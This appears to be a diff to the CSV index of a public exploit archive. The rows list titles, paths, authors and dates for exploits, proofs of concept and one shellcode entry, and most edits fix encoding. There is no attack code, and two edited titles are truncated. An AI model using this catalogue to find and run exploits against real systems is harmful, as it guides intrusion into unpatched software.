9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - (.vib) Local Stack Overflow PoC",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow Exploit (SEH)",2009-07-15,hack4love,windows,local,0 @@ -8876,7 +8876,7 @@ id,file,description,date,author,platform,type,port 9407,platforms/php/webapps/9407.txt,"CMS Made Simple <= 1.6.2 - Local File Disclosure Vulnerability",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit",2009-08-10,"ilker Kandemir",php,webapps,0 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 - (.lst/.m3u) Universal BoF Exploit (SEH)",2009-08-10,hack4love,windows,local,0 -9410,platforms/php/webapps/9410.txt,"Wordpress <= 2.8.3 - Remote Admin Reset Password Vulnerability",2009-08-11,"laurent gaffié ",php,webapps,0 +9410,platforms/php/webapps/9410.txt,"Wordpress <= 2.8.3 - Remote Admin Reset Password Vulnerability",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0 @@ -8984,7 +8984,7 @@ id,file,description,date,author,platform,type,port 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0 -9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clment Lecigne",linux,local,0 +9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 @@ -9186,7 +9186,7 @@ id,file,description,date,author,platform,type,port 9728,platforms/multiple/webapps/9728.txt,"ProdLer <= 2.0 - Remote File Include Vulnerability",2009-09-21,"cr4wl3r ",multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project <= 9.4.5 - Multiple Remote File Include Vulnerability",2009-09-21,"cr4wl3r ",multiple,webapps,0 9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 SQLi and persistent XSS",2009-09-21,learn3r,multiple,webapps,0 -9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincn Crespo",multiple,dos,0 +9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 @@ -9243,7 +9243,7 @@ id,file,description,date,author,platform,type,port 9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 -9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - XSS",2009-10-05,"Sbastien Duquette",asp,webapps,0 +9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - XSS",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS Hardcoded Password Vulnerability 4.7.0",2009-10-08,"Marek Kroemeke",hardware,remote,8022 9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 @@ -9267,7 +9267,7 @@ id,file,description,date,author,platform,type,port 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 -9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x - xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0 +9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x - XSS & Information Disclosure & Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 @@ -9282,7 +9282,7 @@ id,file,description,date,author,platform,type,port 9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 - 0.7.61 / 0.6.0 - 0.6.38 / 0.5.0 - 0.5.37 / 0.4.0 - 0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 -9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0 +9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS & SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 @@ -9336,6 +9336,7 @@ id,file,description,date,author,platform,type,port 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 - XSS and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 +16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS Vulnerability",2011-01-17,Penguin,php,webapps,0 9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 @@ -9345,6 +9346,8 @@ id,file,description,date,author,platform,type,port 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0 +33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 +33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80 @@ -9355,6 +9358,7 @@ id,file,description,date,author,platform,type,port 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 +14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0 @@ -9440,6 +9444,12 @@ id,file,description,date,author,platform,type,port 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 +33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0 +33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 +33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 +33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 @@ -9622,7 +9632,7 @@ id,file,description,date,author,platform,type,port 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI, RFI and XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 +10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI & RFI & XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS Vulnerability",2009-12-08,mr_me,php,webapps,0 @@ -9648,7 +9658,7 @@ id,file,description,date,author,platform,type,port 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code Vulnerability",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 -10379,platforms/php/webapps/10379.txt,"oBlog - Persistant XSS, CSRF, Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 +10379,platforms/php/webapps/10379.txt,"oBlog - Persistant XSS & CSRF & Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution (0day)",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store SQL Injection Vulnerability",2009-12-11,"Salvatore Fresta",php,webapps,0 @@ -9660,6 +9670,7 @@ id,file,description,date,author,platform,type,port 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 (PLS File) Universal Stack Overflow (meta)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 +14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs Memory Corruption PoC",2009-12-12,"Jeremy Brown",linux,local,0 10398,platforms/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website [ XSS / Auth Bypass ]",2009-12-12,bi0,php,webapps,0 @@ -9733,6 +9744,7 @@ id,file,description,date,author,platform,type,port 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script Remote Database Disclosure Vulnerability",2009-12-16,"ViRuSMaN ",asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Local Privilege Escalation Vulnerability",2009-12-16,"Maxim A. Kulakov",windows,local,0 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module XSS Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0 +14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner Root Vulnerability",2009-12-16,"Dominick LaTrappe",linux,local,0 10488,platforms/php/webapps/10488.txt,"WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 @@ -9813,7 +9825,7 @@ id,file,description,date,author,platform,type,port 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart SQL Injection Vulnerability",2009-12-21,Gamoscu,asp,webapps,0 10583,platforms/php/webapps/10583.txt,"social Web CMS <= beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload Vulnerability",2009-12-21,"wlhaan hacker",php,webapps,0 -10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection Vulnerability",2009-12-21,_NFAZCI_,php,webapps,0 +10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection Vulnerability",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection Vulnerability",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 10588,platforms/php/webapps/10588.txt,"PDQ Script <= 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 @@ -9886,6 +9898,8 @@ id,file,description,date,author,platform,type,port 10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 10675,platforms/php/webapps/10675.txt,"Webring - Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 +14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 +14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.m3u) Buffer Overflow",2010-07-01,Madjix,windows,local,0 10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass Vulnerability",2009-12-26,indoushka,php,webapps,0 10679,platforms/php/webapps/10679.txt,"Quiz - Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 @@ -10011,11 +10025,11 @@ id,file,description,date,author,platform,type,port 10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0day)",2009-12-31,emgent,php,dos,80 10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0 -10823,platforms/asp/webapps/10823.txt,"UranyumSoft lan Servisi - Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0 +10823,platforms/asp/webapps/10823.txt,UranyumSoft,2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0 10825,platforms/php/dos/10825.sh,"Wordpress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80 10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80 -10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit",2009-12-30,"Sbastien Duquette",windows,local,0 +10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service Vulnerability",2009-12-30,R3d-D3V!L,php,dos,0 10830,platforms/php/webapps/10830.txt,"Azadi Network (page) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 @@ -10130,7 +10144,7 @@ id,file,description,date,author,platform,type,port 11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting Vulnerability",2010-01-06,indoushka,php,webapps,0 11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload Vulnerability",2010-01-06,"wlhaan hacker",php,webapps,0 -11020,platforms/windows/dos/11020.pl,"[GOM Audio Local Crash PoC]",2010-01-06,applicationlayer,windows,dos,0 +11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash PoC",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec PoC (0day)",2010-01-06,superli,windows,dos,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 (Post Auth) Remote BoF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT Database Disclosure Vulnerability",2010-01-06,LionTurk,asp,webapps,0 @@ -10169,7 +10183,7 @@ id,file,description,date,author,platform,type,port 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0 11076,platforms/php/webapps/11076.txt,"PPVChat Mulitiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 -11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow",2010-01-10,"Sbastien Duquette",windows,local,0 +11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game (game) SQL Injection Vulnerability",2010-01-10,Err0R,php,webapps,0 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injection(s) Vulnerability",2010-01-10,Cyber_945,php,webapps,0 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 @@ -10215,7 +10229,7 @@ id,file,description,date,author,platform,type,port 11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - (.ini) Local Stack Buffer Overflow PoC",2010-01-14,"fl0 fl0w",windows,local,0 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager SQL Injection Vulnerability",2010-01-14,FL0RiX,php,webapps,0 11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 -11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (Itunes, Quicktime, etc)",2010-01-15,Dr_IDE,multiple,dos,0 +11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (Itunes & Quicktime etc)",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite PoC",2010-01-15,Darkb0x,windows,dos,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite Vulnerability",2010-01-15,"Mert SARICA",windows,local,0 11147,platforms/php/webapps/11147.txt,"Max's File Uploader Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0 @@ -10432,7 +10446,7 @@ id,file,description,date,author,platform,type,port 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 -11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS, Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 +11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS & Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS Vulnerability",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure Vulnerability",2010-02-11,Phenom,windows,webapps,80 @@ -10473,7 +10487,7 @@ id,file,description,date,author,platform,type,port 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) #",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 -11455,platforms/php/webapps/11455.txt,"Gnr par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 +11455,platforms/php/webapps/11455.txt,G,2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0 11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 - SQL injection",2010-02-15,kaMtiEz,php,webapps,0 @@ -10666,6 +10680,7 @@ id,file,description,date,author,platform,type,port 11679,platforms/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script (search_result.php) SQL Injection Vulnerability",2010-03-10,"Easy Laster",php,webapps,0 11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS - CSRF Vulnerability",2010-03-10,"pratul agrawal",php,webapps,0 11681,platforms/php/webapps/11681.txt,"ispCP Omega <= 1.0.4 - Remote File Include Vulnerability",2010-03-10,"cr4wl3r ",php,webapps,0 +14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 - Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local,0 11682,platforms/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - (.m3u) HREF Buffer Overflow",2010-03-10,l3D,windows,local,0 11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)",2010-03-10,Trancer,windows,remote,0 11684,platforms/php/webapps/11684.txt,"Joomla com_about Remote SQL Injection Vulnerability",2010-03-11,snakespc,php,webapps,0 @@ -10705,15 +10720,19 @@ id,file,description,date,author,platform,type,port 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection Vulnerability",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability",2010-03-14,Inj3ct0r,php,webapps,0 +14113,platforms/linux/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(""/bin/sh""_""/bin/sh""_0) (38 bytes)",2010-06-29,"Jonathan Salwan",linux,shellcode,0 